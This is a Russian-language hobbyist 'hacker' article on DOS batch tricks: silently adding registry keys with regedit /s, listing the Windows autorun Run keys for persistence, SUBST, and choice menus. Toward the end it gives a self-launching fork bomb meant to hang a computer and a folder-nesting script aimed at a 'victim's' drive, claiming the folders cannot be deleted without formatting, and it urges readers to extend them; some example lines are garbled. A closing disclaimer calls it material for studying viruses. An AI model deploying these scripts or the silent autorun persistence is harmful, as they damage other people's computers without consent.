Привет тебе снова юный хокер. В этой статье я буду рассказывать про новые фишки с (ДОС — дисковая операционная система). Эта статья рассчитана на чела, который уже знаком с спецификацией ДОС. Если не знакомы то я не виноват, самим надо учить.

Дело было вечером, делать было нечего и я взялся за эту статью хоть и впадлу. Итак, начнем, пожалуй, с реестра. А точнее — добавлению в него ключей.

regedit /s file.reg - добавить ключи в реестр из файла, без вопросов

Но файл нужно создать, а потом добавить, сделаем это вот так:

echo REGEDIT4 > file.reg
echo я >> file.reg
echo >>[HKEY_CURRENT_USER\Software\Valve\Half-Life\Settings] >> file.reg
echo >>"Key"="3928841909592" >>file.reg
regedit /s file.reg

Этот скрипт добавляет ключ в реестр :) Сначала создаем файл а потом добавляем его в реестр. Вписать в него можно много всего хорошего и, например:

"ftplocpatch"="ftp://ftp.cuteftp.com/update/cuteftp"
"Key1"=hex:41,36,42,33,34,35,36,38,6b,32,77,63,32,33,00
"RegUserName"="iND"
"CmdLine"="C:\\PROGRA~1\\GlobalSCAPE\\CuteFTP\\Cutftp32.exe"
"Shell Integration"="1"
"handlerRequired"=dword:00000001
"DefaultHandler"="MSDFMAP.Handler"
"ThreadingModel"="Apartment"

Это просто примеры и на низ внимания не обращайте.

Или таким способом:

HKEY_CLASSES_ROOT\Photoshop.Image.6\shellex = - Опустошаем параметр
HKEY_CLASSES_ROOT\Photoshop.Image.6\shellex = 1 - Присваиваем значение "1"

А в этом скрипте уже указано, куда добавить ключ из файла:

regedit /e Win.reg "HKEY_CURRENT_USER\Software\WinOrganizer"

А это места которые запускаются при автозапуске

HKEY_CURRENT_USER\Software\ Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\Windows\CurrentVersion\RunServices
HKEY_USERS\.DEFAULT\Software\ Microsoft\Windows\CurrentVersion\Run

Вот такими способами можно дописаться в реестр на выполнение или работу! И с помощью реестра можно сделать много.
Теперь расскажу про программу SUBST, она сопоставляет заданному пути имя диска.

SUBST [диск1: [диск2:]путь]
SUBST диск1: /D

диск1: Виртуальный диск, который сопоставляется указанному пути.
[диск2:]путь Физические диск и путь,
которым сопоставляется виртуальный диск.
/D Удаление ранее созданного виртуального диска.

Ввод SUBST без параметров позволяет вывести текущий список виртуальных дисков

Например, subst g: c:\folder это, значит, создать виртуальный диск g: из папки c:\folder...
Да простят меня за тырр, но идея взята с другой статьи:

Будем создавать меню с помощью всё тех же досовских команд. Для этого нам понадобится конструкция choice. Чтобы было понятней разберём пример:

echo S - Start program.
echo H - Help.
echo E - Exit program
choice /c:SHE Push one of this keys
if errorlevel 3 goto exit
if errorlevel 2 goto help
if errorlevel 1 goto start

После запуска этого скрипта перед тобой появятся первые три строчки, а под ними предложение нажать на одну из предложенных клавиш (S,H и E). После нажатия на одну из них, переменной errorlevel присвоится номер выбранной клавиши. Как узнать номер?
Посмотри сюда:
choice /c:SHE

Здесь SHE это три клавиши, на которые можно нажать. S по счёту 1ая, H 2ая, E соответственно 3я. Вот по такому порядку им присваивается номер. Теперь вернёмся к нашему скрипту. При нажатии на кнопку H, к примеру, переменная errorlevel примет значение 2 (так как H 2ая по порядку), далее с помощью условного оператора (if) скрипт проверяет содержание этой переменной. В нашем случае errorlevel = 2. Поэтому скрипт выполнит последующую команду goto help (перескочит на метку help).
Чёнить понял? Хммм..хренова. Введи с командной строки choice /?. И мож чё поймёшь =).
Основная часть кончилась, так что если всё понял, можешь читать дальше.
Если тебе не нужна менюшка, а просто выбор yes\no, используй choice без параметра /c. В этом случае при нажатии на Y переменной errorlevel присвоится значение 1, а при нажатии на N соответственно 2.
Если тебе нужно, чтоб выбор клавиш не отображался, используй флаг /n.
/T:%ответ%,%время_в_сек% - если по истечению указанного времени юзер не нажал одну из требуемых клавиш, скрипт сам выберет ту, которая прописана на месте слова "%ответ%".

Однажды когда мы писали с другом приколы, в башку пришла абалденная идея, повесть компьютер. Это пишется в три строчки!

:a
start %0
goto a

Этот скрипт начнет неистово сам себя запускать и комп завсинет! ;)
А следующий скрипт создает очень много папок в другой папке. Забить эти папки легче всего.

cd\
md 1
:a
md 1
cd 1
goto a
:: Создает на диске C: 121 подкаталог!
:: Можно дописать и создание файла внутри!

Этот скрипт создаст кучу файлов на диске c:\ и в папках 1\1\1\1\1\1\1 и,т,д И такая папка застрянет на винчестере жертвы до первого форматирования. Сам проверял. Ни через дос ни через что их удалить не получится!
А проблема в том, что при наведении курсором на них Explorer вылетает. И это не предел ты можешь сам модернизировать такой скрипт и сделать все, что только можно и нельзя.

Ну, вот пока и все, будут появляться новые идеи, напишу. Следите за обновлениями.

Статьи написаны исключительно для изучения алгоритмов работы вирусов и методов борьбы с ними. Алгоритмы работы вирусов были выявлены при декомпиляции найденных в интернете вирусов и на сайте Лаборатории Касперского.